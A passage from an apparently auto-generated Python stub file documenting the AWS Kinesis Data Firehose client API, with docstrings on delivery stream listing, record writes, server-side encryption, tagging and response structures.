'Type': 'RETIRE_KMS_GRANT_FAILED'|'CREATE_KMS_GRANT_FAILED'|'KMS_ACCESS_DENIED'|'DISABLED_KMS_KEY'|'INVALID_KMS_KEY'|'KMS_KEY_NOT_FOUND'|'KMS_OPT_IN_REQUIRED'|'CREATE_ENI_FAILED'|'DELETE_ENI_FAILED'|'SUBNET_NOT_FOUND'|'SECURITY_GROUP_NOT_FOUND'|'ENI_ACCESS_DENIED'|'SUBNET_ACCESS_DENIED'|'SECURITY_GROUP_ACCESS_DENIED'|'UNKNOWN_ERROR',
'Details': 'string'
},
'DeliveryStreamEncryptionConfiguration': {
'KeyARN': 'string',
'KeyType': 'AWS_OWNED_CMK'|'CUSTOMER_MANAGED_CMK',
'Status': 'ENABLED'|'ENABLING'|'ENABLING_FAILED'|'DISABLED'|'DISABLING'|'DISABLING_FAILED',
'FailureDescription': {
'Type': 'RETIRE_KMS_GRANT_FAILED'|'CREATE_KMS_GRANT_FAILED'|'KMS_ACCESS_DENIED'|'DISABLED_KMS_KEY'|'INVALID_KMS_KEY'|'KMS_KEY_NOT_FOUND'|'KMS_OPT_IN_REQUIRED'|'CREATE_ENI_FAILED'|'DELETE_ENI_FAILED'|'SUBNET_NOT_FOUND'|'SECURITY_GROUP_NOT_FOUND'|'ENI_ACCESS_DENIED'|'SUBNET_ACCESS_DENIED'|'SECURITY_GROUP_ACCESS_DENIED'|'UNKNOWN_ERROR',
'Details': 'string'
}
},
'DeliveryStreamType': 'DirectPut'|'KinesisStreamAsSource',
'VersionId': 'string',
'CreateTimestamp': datetime(2015, 1, 1),
'LastUpdateTimestamp': datetime(2015, 1, 1),
'Source': {
'KinesisStreamSourceDescription': {
'KinesisStreamARN': 'string',
'RoleARN': 'string',
'DeliveryStartTimestamp': datetime(2015, 1, 1)
}
},
'Destinations': [
{
'DestinationId': 'string',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ExtendedS3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'DataFormatConversionConfiguration': {
'SchemaConfiguration': {
'RoleARN': 'string',
'CatalogId': 'string',
'DatabaseName': 'string',
'TableName': 'string',
'Region': 'string',
'VersionId': 'string'
},
'InputFormatConfiguration': {
'Deserializer': {
'OpenXJsonSerDe': {
'ConvertDotsInJsonKeysToUnderscores': True|False,
'CaseInsensitive': True|False,
'ColumnToJsonKeyMappings': {
'string': 'string'
}
},
'HiveJsonSerDe': {
'TimestampFormats': [
'string',
]
}
}
},
'OutputFormatConfiguration': {
'Serializer': {
'ParquetSerDe': {
'BlockSizeBytes': 123,
'PageSizeBytes': 123,
'Compression': 'UNCOMPRESSED'|'GZIP'|'SNAPPY',
'EnableDictionaryCompression': True|False,
'MaxPaddingBytes': 123,
'WriterVersion': 'V1'|'V2'
},
'OrcSerDe': {
'StripeSizeBytes': 123,
'BlockSizeBytes': 123,
'RowIndexStride': 123,
'EnablePadding': True|False,
'PaddingTolerance': 123.0,
'Compression': 'NONE'|'ZLIB'|'SNAPPY',
'BloomFilterColumns': [
'string',
],
'BloomFilterFalsePositiveProbability': 123.0,
'DictionaryKeyThreshold': 123.0,
'FormatVersion': 'V0_11'|'V0_12'
}
}
},
'Enabled': True|False
}
},
'RedshiftDestinationDescription': {
'RoleARN': 'string',
'ClusterJDBCURL': 'string',
'CopyCommand': {
'DataTableName': 'string',
'DataTableColumns': 'string',
'CopyOptions': 'string'
},
'Username': 'string',
'RetryOptions': {
'DurationInSeconds': 123
},
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ElasticsearchDestinationDescription': {
'RoleARN': 'string',
'DomainARN': 'string',
'ClusterEndpoint': 'string',
'IndexName': 'string',
'TypeName': 'string',
'IndexRotationPeriod': 'NoRotation'|'OneHour'|'OneDay'|'OneWeek'|'OneMonth',
'BufferingHints': {
'IntervalInSeconds': 123,
'SizeInMBs': 123
},
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedDocumentsOnly'|'AllDocuments',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'VpcConfigurationDescription': {
'SubnetIds': [
'string',
],
'RoleARN': 'string',
'SecurityGroupIds': [
'string',
],
'VpcId': 'string'
}
},
'SplunkDestinationDescription': {
'HECEndpoint': 'string',
'HECEndpointType': 'Raw'|'Event',
'HECToken': 'string',
'HECAcknowledgmentTimeoutInSeconds': 123,
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedEventsOnly'|'AllEvents',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
}
},
],
'HasMoreDestinations': True|False
}
}
:returns:
DirectPut : Provider applications access the delivery stream directly.
KinesisStreamAsSource : The delivery stream uses a Kinesis data stream as a source.
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def list_delivery_streams(Limit=None, DeliveryStreamType=None, ExclusiveStartDeliveryStreamName=None):
"""
Lists your delivery streams in alphabetical order of their names.
The number of delivery streams might be too large to return using a single call to ListDeliveryStreams . You can limit the number of delivery streams returned, using the Limit parameter. To determine whether there are more delivery streams to list, check the value of HasMoreDeliveryStreams in the output. If there are more delivery streams to list, you can request them by calling this operation again and setting the ExclusiveStartDeliveryStreamName parameter to the name of the last delivery stream returned in the last call.
See also: AWS API Documentation
:example: response = client.list_delivery_streams(
Limit=123,
DeliveryStreamType='DirectPut'|'KinesisStreamAsSource',
ExclusiveStartDeliveryStreamName='string'
)
:type Limit: integer
:param Limit: The maximum number of delivery streams to list. The default value is 10.
:type DeliveryStreamType: string
:param DeliveryStreamType: The delivery stream type. This can be one of the following values:\n\nDirectPut : Provider applications access the delivery stream directly.\nKinesisStreamAsSource : The delivery stream uses a Kinesis data stream as a source.\n\nThis parameter is optional. If this parameter is omitted, delivery streams of all types are returned.\n
:type ExclusiveStartDeliveryStreamName: string
:param ExclusiveStartDeliveryStreamName: The list of delivery streams returned by this call to ListDeliveryStreams will start with the delivery stream whose name comes alphabetically immediately after the name you specify in ExclusiveStartDeliveryStreamName .
:rtype: dict
ReturnsResponse Syntax
{
'DeliveryStreamNames': [
'string',
],
'HasMoreDeliveryStreams': True|False
}
Response Structure
(dict) --
DeliveryStreamNames (list) --
The names of the delivery streams.
(string) --
HasMoreDeliveryStreams (boolean) --
Indicates whether there are more delivery streams available to list.
:return: {
'DeliveryStreamNames': [
'string',
],
'HasMoreDeliveryStreams': True|False
}
:returns:
(string) --
"""
pass
def list_tags_for_delivery_stream(DeliveryStreamName=None, ExclusiveStartTagKey=None, Limit=None):
"""
Lists the tags for the specified delivery stream. This operation has a limit of five transactions per second per account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_delivery_stream(
DeliveryStreamName='string',
ExclusiveStartTagKey='string',
Limit=123
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream whose tags you want to list.\n
:type ExclusiveStartTagKey: string
:param ExclusiveStartTagKey: The key to use as the starting point for the list of tags. If you set this parameter, ListTagsForDeliveryStream gets all tags that occur after ExclusiveStartTagKey .
:type Limit: integer
:param Limit: The number of tags to return. If this number is less than the total number of tags associated with the delivery stream, HasMoreTags is set to true in the response. To list additional tags, set ExclusiveStartTagKey to the last key in the response.
:rtype: dict
ReturnsResponse Syntax
{
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'HasMoreTags': True|False
}
Response Structure
(dict) --
Tags (list) --
A list of tags associated with DeliveryStreamName , starting with the first tag after ExclusiveStartTagKey and up to the specified Limit .
(dict) --
Metadata that you can assign to a delivery stream, consisting of a key-value pair.
Key (string) --
A unique identifier for the tag. Maximum length: 128 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @
Value (string) --
An optional string, which you can use to describe or define the tag. Maximum length: 256 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @
HasMoreTags (boolean) --
If this is true in the response, more tags are available. To list the remaining tags, set ExclusiveStartTagKey to the key of the last tag returned and call ListTagsForDeliveryStream again.
Exceptions
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.LimitExceededException
:return: {
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'HasMoreTags': True|False
}
:returns:
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.LimitExceededException
"""
pass
def put_record(DeliveryStreamName=None, Record=None):
"""
Writes a single data record into an Amazon Kinesis Data Firehose delivery stream. To write multiple data records into a delivery stream, use PutRecordBatch . Applications using these operations are referred to as producers.
By default, each delivery stream can take in up to 2,000 transactions per second, 5,000 records per second, or 5 MB per second. If you use PutRecord and PutRecordBatch , the limits are an aggregate across these two operations for each delivery stream. For more information about limits and how to request an increase, see Amazon Kinesis Data Firehose Limits .
You must specify the name of the delivery stream and the data record when using PutRecord . The data record consists of a data blob that can be up to 1,000 KB in size, and any kind of data. For example, it can be a segment from a log file, geographic location data, website clickstream data, and so on.
Kinesis Data Firehose buffers records before delivering them to the destination. To disambiguate the data blobs at the destination, a common solution is to use delimiters in the data, such as a newline (\
) or some other character unique within the data. This allows the consumer application to parse individual data items when reading the data from the destination.
The PutRecord operation returns a RecordId , which is a unique string assigned to each record. Producer applications can use this ID for purposes such as auditability and investigation.
If the PutRecord operation throws a ServiceUnavailableException , back off and retry. If the exception persists, it is possible that the throughput limits have been exceeded for the delivery stream.
Data records sent to Kinesis Data Firehose are stored for 24 hours from the time they are added to a delivery stream as it tries to send the records to the destination. If the destination is unreachable for more than 24 hours, the data is no longer available.
See also: AWS API Documentation
Exceptions
:example: response = client.put_record(
DeliveryStreamName='string',
Record={
'Data': b'bytes'
}
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream.\n
:type Record: dict
:param Record: [REQUIRED]\nThe record.\n\nData (bytes) -- [REQUIRED]The data blob, which is base64-encoded when the blob is serialized. The maximum size of the data blob, before base64-encoding, is 1,000 KiB.\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'RecordId': 'string',
'Encrypted': True|False
}
Response Structure
(dict) --
RecordId (string) --
The ID of the record.
Encrypted (boolean) --
Indicates whether server-side encryption (SSE) was enabled during this operation.
Exceptions
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.InvalidKMSResourceException
Firehose.Client.exceptions.ServiceUnavailableException
:return: {
'RecordId': 'string',
'Encrypted': True|False
}
:returns:
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.InvalidKMSResourceException
Firehose.Client.exceptions.ServiceUnavailableException
"""
pass
def put_record_batch(DeliveryStreamName=None, Records=None):
"""
Writes multiple data records into a delivery stream in a single call, which can achieve higher throughput per producer than when writing single records. To write single data records into a delivery stream, use PutRecord . Applications using these operations are referred to as producers.
By default, each delivery stream can take in up to 2,000 transactions per second, 5,000 records per second, or 5 MB per second. If you use PutRecord and PutRecordBatch , the limits are an aggregate across these two operations for each delivery stream. For more information about limits, see Amazon Kinesis Data Firehose Limits .
Each PutRecordBatch request supports up to 500 records. Each record in the request can be as large as 1,000 KB (before 64-bit encoding), up to a limit of 4 MB for the entire request. These limits cannot be changed.
You must specify the name of the delivery stream and the data record when using PutRecord . The data record consists of a data blob that can be up to 1,000 KB in size, and any kind of data. For example, it could be a segment from a log file, geographic location data, website clickstream data, and so on.
Kinesis Data Firehose buffers records before delivering them to the destination. To disambiguate the data blobs at the destination, a common solution is to use delimiters in the data, such as a newline (\
) or some other character unique within the data. This allows the consumer application to parse individual data items when reading the data from the destination.
The PutRecordBatch response includes a count of failed records, FailedPutCount , and an array of responses, RequestResponses . Even if the PutRecordBatch call succeeds, the value of FailedPutCount may be greater than 0, indicating that there are records for which the operation didn\'t succeed. Each entry in the RequestResponses array provides additional information about the processed record. It directly correlates with a record in the request array using the same ordering, from the top to the bottom. The response array always includes the same number of records as the request array. RequestResponses includes both successfully and unsuccessfully processed records. Kinesis Data Firehose tries to process all records in each PutRecordBatch request. A single record failure does not stop the processing of subsequent records.
A successfully processed record includes a RecordId value, which is unique for the record. An unsuccessfully processed record includes ErrorCode and ErrorMessage values. ErrorCode reflects the type of error, and is one of the following values: ServiceUnavailableException or InternalFailure . ErrorMessage provides more detailed information about the error.
If there is an internal server error or a timeout, the write might have completed or it might have failed. If FailedPutCount is greater than 0, retry the request, resending only those records that might have failed processing. This minimizes the possible duplicate records and also reduces the total bytes sent (and corresponding charges). We recommend that you handle any duplicates at the destination.
If PutRecordBatch throws ServiceUnavailableException , back off and retry. If the exception persists, it is possible that the throughput limits have been exceeded for the delivery stream.
Data records sent to Kinesis Data Firehose are stored for 24 hours from the time they are added to a delivery stream as it attempts to send the records to the destination. If the destination is unreachable for more than 24 hours, the data is no longer available.
See also: AWS API Documentation
Exceptions
:example: response = client.put_record_batch(
DeliveryStreamName='string',
Records=[
{
'Data': b'bytes'
},
]
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream.\n
:type Records: list
:param Records: [REQUIRED]\nOne or more records.\n\n(dict) --The unit of data in a delivery stream.\n\nData (bytes) -- [REQUIRED]The data blob, which is base64-encoded when the blob is serialized. The maximum size of the data blob, before base64-encoding, is 1,000 KiB.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'FailedPutCount': 123,
'Encrypted': True|False,
'RequestResponses': [
{
'RecordId': 'string',
'ErrorCode': 'string',
'ErrorMessage': 'string'
},
]
}
Response Structure
(dict) --
FailedPutCount (integer) --
The number of records that might have failed processing. This number might be greater than 0 even if the PutRecordBatch call succeeds. Check FailedPutCount to determine whether there are records that you need to resend.
Encrypted (boolean) --
Indicates whether server-side encryption (SSE) was enabled during this operation.
RequestResponses (list) --
The results array. For each record, the index of the response element is the same as the index used in the request array.
(dict) --
Contains the result for an individual record from a PutRecordBatch request. If the record is successfully added to your delivery stream, it receives a record ID. If the record fails to be added to your delivery stream, the result includes an error code and an error message.
RecordId (string) --
The ID of the record.
ErrorCode (string) --
The error code for an individual record result.
ErrorMessage (string) --
The error message for an individual record result.
Exceptions
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.InvalidKMSResourceException
Firehose.Client.exceptions.ServiceUnavailableException
:return: {
'FailedPutCount': 123,
'Encrypted': True|False,
'RequestResponses': [
{
'RecordId': 'string',
'ErrorCode': 'string',
'ErrorMessage': 'string'
},
]
}
:returns:
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.InvalidKMSResourceException
Firehose.Client.exceptions.ServiceUnavailableException
"""
pass
def start_delivery_stream_encryption(DeliveryStreamName=None, DeliveryStreamEncryptionConfigurationInput=None):
"""
Enables server-side encryption (SSE) for the delivery stream.
This operation is asynchronous. It returns immediately. When you invoke it, Kinesis Data Firehose first sets the encryption status of the stream to ENABLING , and then to ENABLED . The encryption status of a delivery stream is the Status property in DeliveryStreamEncryptionConfiguration . If the operation fails, the encryption status changes to ENABLING_FAILED . You can continue to read and write data to your delivery stream while the encryption status is ENABLING , but the data is not encrypted. It can take up to 5 seconds after the encryption status changes to ENABLED before all records written to the delivery stream are encrypted. To find out whether a record or a batch of records was encrypted, check the response elements PutRecordOutput$Encrypted and PutRecordBatchOutput$Encrypted , respectively.
To check the encryption status of a delivery stream, use DescribeDeliveryStream .
Even if encryption is currently enabled for a delivery stream, you can still invoke this operation on it to change the ARN of the CMK or both its type and ARN. If you invoke this method to change the CMK, and the old CMK is of type CUSTOMER_MANAGED_CMK , Kinesis Data Firehose schedules the grant it had on the old CMK for retirement. If the new CMK is of type CUSTOMER_MANAGED_CMK , Kinesis Data Firehose creates a grant that enables it to use the new CMK to encrypt and decrypt data and to manage the grant.
If a delivery stream already has encryption enabled and then you invoke this operation to change the ARN of the CMK or both its type and ARN and you get ENABLING_FAILED , this only means that the attempt to change the CMK failed. In this case, encryption remains enabled with the old CMK.
If the encryption status of your delivery stream is ENABLING_FAILED , you can invoke this operation again with a valid CMK. The CMK must be enabled and the key policy mustn\'t explicitly deny the permission for Kinesis Data Firehose to invoke KMS encrypt and decrypt operations.
You can enable SSE for a delivery stream only if it\'s a delivery stream that uses DirectPut as its source.
The StartDeliveryStreamEncryption and StopDeliveryStreamEncryption operations have a combined limit of 25 calls per delivery stream per 24 hours. For example, you reach the limit if you call StartDeliveryStreamEncryption 13 times and StopDeliveryStreamEncryption 12 times for the same delivery stream in a 24-hour period.
See also: AWS API Documentation
Exceptions
:example: response = client.start_delivery_stream_encryption(
DeliveryStreamName='string',
DeliveryStreamEncryptionConfigurationInput={
'KeyARN': 'string',
'KeyType': 'AWS_OWNED_CMK'|'CUSTOMER_MANAGED_CMK'
}
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream for which you want to enable server-side encryption (SSE).\n
:type DeliveryStreamEncryptionConfigurationInput: dict
:param DeliveryStreamEncryptionConfigurationInput: Used to specify the type and Amazon Resource Name (ARN) of the KMS key needed for Server-Side Encryption (SSE).\n\nKeyARN (string) --If you set KeyType to CUSTOMER_MANAGED_CMK , you must specify the Amazon Resource Name (ARN) of the CMK. If you set KeyType to AWS_OWNED_CMK , Kinesis Data Firehose uses a service-account CMK.\n\nKeyType (string) -- [REQUIRED]Indicates the type of customer master key (CMK) to use for encryption. The default setting is AWS_OWNED_CMK . For more information about CMKs, see Customer Master Keys (CMKs) . When you invoke CreateDeliveryStream or StartDeliveryStreamEncryption with KeyType set to CUSTOMER_MANAGED_CMK, Kinesis Data Firehose invokes the Amazon KMS operation CreateGrant to create a grant that allows the Kinesis Data Firehose service to use the customer managed CMK to perform encryption and decryption. Kinesis Data Firehose manages that grant.\nWhen you invoke StartDeliveryStreamEncryption to change the CMK for a delivery stream that is encrypted with a customer managed CMK, Kinesis Data Firehose schedules the grant it had on the old CMK for retirement.\nYou can use a CMK of type CUSTOMER_MANAGED_CMK to encrypt up to 500 delivery streams. If a CreateDeliveryStream or StartDeliveryStreamEncryption operation exceeds this limit, Kinesis Data Firehose throws a LimitExceededException .\n\nWarning\nTo encrypt your delivery stream, use symmetric CMKs. Kinesis Data Firehose doesn\'t support asymmetric CMKs. For information about symmetric and asymmetric CMKs, see About Symmetric and Asymmetric CMKs in the AWS Key Management Service developer guide.\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.ResourceInUseException
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.LimitExceededException
Firehose.Client.exceptions.InvalidKMSResourceException
:return: {}
:returns:
(dict) --
"""
pass
def stop_delivery_stream_encryption(DeliveryStreamName=None):
"""
Disables server-side encryption (SSE) for the delivery stream.
This operation is asynchronous. It returns immediately. When you invoke it, Kinesis Data Firehose first sets the encryption status of the stream to DISABLING , and then to DISABLED . You can continue to read and write data to your stream while its status is DISABLING . It can take up to 5 seconds after the encryption status changes to DISABLED before all records written to the delivery stream are no longer subject to encryption. To find out whether a record or a batch of records was encrypted, check the response elements PutRecordOutput$Encrypted and PutRecordBatchOutput$Encrypted , respectively.
To check the encryption state of a delivery stream, use DescribeDeliveryStream .
If SSE is enabled using a customer managed CMK and then you invoke StopDeliveryStreamEncryption , Kinesis Data Firehose schedules the related KMS grant for retirement and then retires it after it ensures that it is finished delivering records to the destination.
The StartDeliveryStreamEncryption and StopDeliveryStreamEncryption operations have a combined limit of 25 calls per delivery stream per 24 hours. For example, you reach the limit if you call StartDeliveryStreamEncryption 13 times and StopDeliveryStreamEncryption 12 times for the same delivery stream in a 24-hour period.
See also: AWS API Documentation
Exceptions
:example: response = client.stop_delivery_stream_encryption(
DeliveryStreamName='string'
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream for which you want to disable server-side encryption (SSE).\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.ResourceInUseException
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.LimitExceededException
:return: {}
:returns:
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.ResourceInUseException
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.LimitExceededException
"""
pass
def tag_delivery_stream(DeliveryStreamName=None, Tags=None):
"""
Adds or updates tags for the specified delivery stream. A tag is a key-value pair that you can define and assign to AWS resources. If you specify a tag that already exists, the tag value is replaced with the value that you specify in the request. Tags are metadata. For example, you can add friendly names and descriptions or other types of information that can help you distinguish the delivery stream. For more information about tags, see Using Cost Allocation Tags in the AWS Billing and Cost Management User Guide .
Each delivery stream can have up to 50 tags.
This operation has a limit of five transactions per second per account.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_delivery_stream(
DeliveryStreamName='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream to which you want to add the tags.\n
:type Tags: list
:param Tags: [REQUIRED]\nA set of key-value pairs to use to create the tags.\n\n(dict) --Metadata that you can assign to a delivery stream, consisting of a key-value pair.\n\nKey (string) -- [REQUIRED]A unique identifier for the tag. Maximum length: 128 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @\n\nValue (string) --An optional string, which you can use to describe or define the tag. Maximum length: 256 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.ResourceInUseException
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.LimitExceededException
:return: {}
:returns:
(dict) --
"""
pass
def untag_delivery_stream(DeliveryStreamName=None, TagKeys=None):
"""
Removes tags from the specified delivery stream. Removed tags are deleted, and you can\'t recover them after this operation successfully completes.
If you specify a tag that doesn\'t exist, the operation ignores it.
This operation has a limit of five transactions per second per account.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_delivery_stream(
DeliveryStreamName='string',
TagKeys=[
'string',
]
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream.\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nA list of tag keys. Each corresponding tag is removed from the delivery stream.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.ResourceInUseException
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.LimitExceededException
:return: {}
:returns:
(dict) --
"""
pass
def update_destination(DeliveryStreamName=None, CurrentDeliveryStreamVersionId=None, DestinationId=None, S3DestinationUpdate=None, ExtendedS3DestinationUpdate=None, RedshiftDestinationUpdate=None, ElasticsearchDestinationUpdate=None, SplunkDestinationUpdate=None):
"""
Updates the specified destination of the specified delivery stream.
